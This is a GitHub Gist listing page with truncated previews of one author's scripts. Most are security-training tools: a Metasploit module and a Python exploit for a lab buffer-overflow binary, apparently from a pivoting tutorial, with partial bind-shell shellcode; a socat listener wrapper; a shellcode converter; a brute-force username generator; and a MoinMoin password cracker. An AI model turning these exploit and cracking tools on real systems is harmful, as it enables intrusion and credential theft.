Harold Rodriguez superkojiman

superkojiman / serverstrcpy.rb
Created Oct 31, 2016
Metasploit module for Server-Strcpy.exe in the Introduction to Pivoting series
# Server-Strcpy.exe exploit by superkojiman
# http://blog.techorganic.com
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
  Rank = AverageRanking
  include Msf::Exploit::Remote::Tcp
superkojiman / serverstrcpy.py
Created Oct 31, 2016
Exploit for Server-Strcpy.exe in the Introduction to Pivoting series.
#!/usr/bin/env python
# Server-Strcpy.exe exploit by superkojiman
# http://blog.techorganic.com
import socket, sys
def main(target, port):
    # 368 bytes, opens a bind TCP shell on port 4444
    shellcode = (
        "\xd9\xcc\xd9\x74\x24\xf4\x5b\xba\x69\xe4\x4d\x67\x33\xc9" +
superkojiman / soocat.sh
Created Jun 10, 2016
Quick function to run a binary under socat
# Add to .bashrc
# You're welcome
function soocat {
    socat tcp-l:${2},reuseaddr,fork EXEC:${1}
}
superkojiman / README.md
Last active Nov 1, 2020
64-bit binaries for ROP Primer

This repository contains the binaries used in my 64-bit ROP Primer writeup.

View keybase.md

Keybase proof

I hereby claim:

  • I am superkojiman on github.
  • I am superkojiman (https://keybase.io/superkojiman) on keybase.
  • I have a public key whose fingerprint is 3930 5291 0B28 1ABF 7AAD 635C FB70 83F9 0D48 6211

To claim this, I am signing this object:

superkojiman / bin2sc.py
Created Apr 22, 2014
Convert bin to shellcode.
#!/usr/bin/env python
import sys
if __name__ == "__main__":
    if len(sys.argv) < 2:
        print "usage: %s file.bin\n" % (sys.argv[0],)
        sys.exit(0)
    shellcode = "\""
    ctr = 1
    maxlen = 15
superkojiman / namemash.py
Last active Sep 17, 2021
Creating a user name list for brute force attacks.
#!/usr/bin/env python
import sys
import os.path
if __name__ == "__main__":
    if len(sys.argv) != 2:
        print("usage: {} names.txt".format((sys.argv[0])))
        sys.exit(0)
    if not os.path.exists(sys.argv[1]):
superkojiman / moincrack.py
Created Apr 19, 2014
Crack MoinMoin Wiki passwords
#!/usr/bin/env python -Wignore::DeprecationWarning
import sha, base64, traceback, sys
if len(sys.argv) < 3:
    print "usage: %s [user_password_list] [wordlist]" % (sys.argv[0])
    sys.exit(0)
try:
    for line in open(sys.argv[1], "r"):
        a = line.strip().split(":")
superkojiman / getgenre
Created Apr 16, 2014
Get band's musical genre from Wikipedia
#!/usr/bin/env python
import sys
import plistlib
import urllib2
import re
GENRE_LINE = '<a href="http://www.blogger.com/wiki/Music_genre" title="Music genre">Genres</a>\n'
URL_PREFIX = 'http://en.wikipedia.org/wiki/Special:Search/'
artist_genre = {}
superkojiman / whereru
Last active Feb 6, 2017
Get location based on IP address.
#!/usr/bin/env python
import getopt
import sys  # needed for the sys.argv default in main()
import urllib
import socket
def usage(name):
    print 'Usage: %s -i IP' % name
    print 'Usage: %s -h hostname' % name
def main(argv=sys.argv):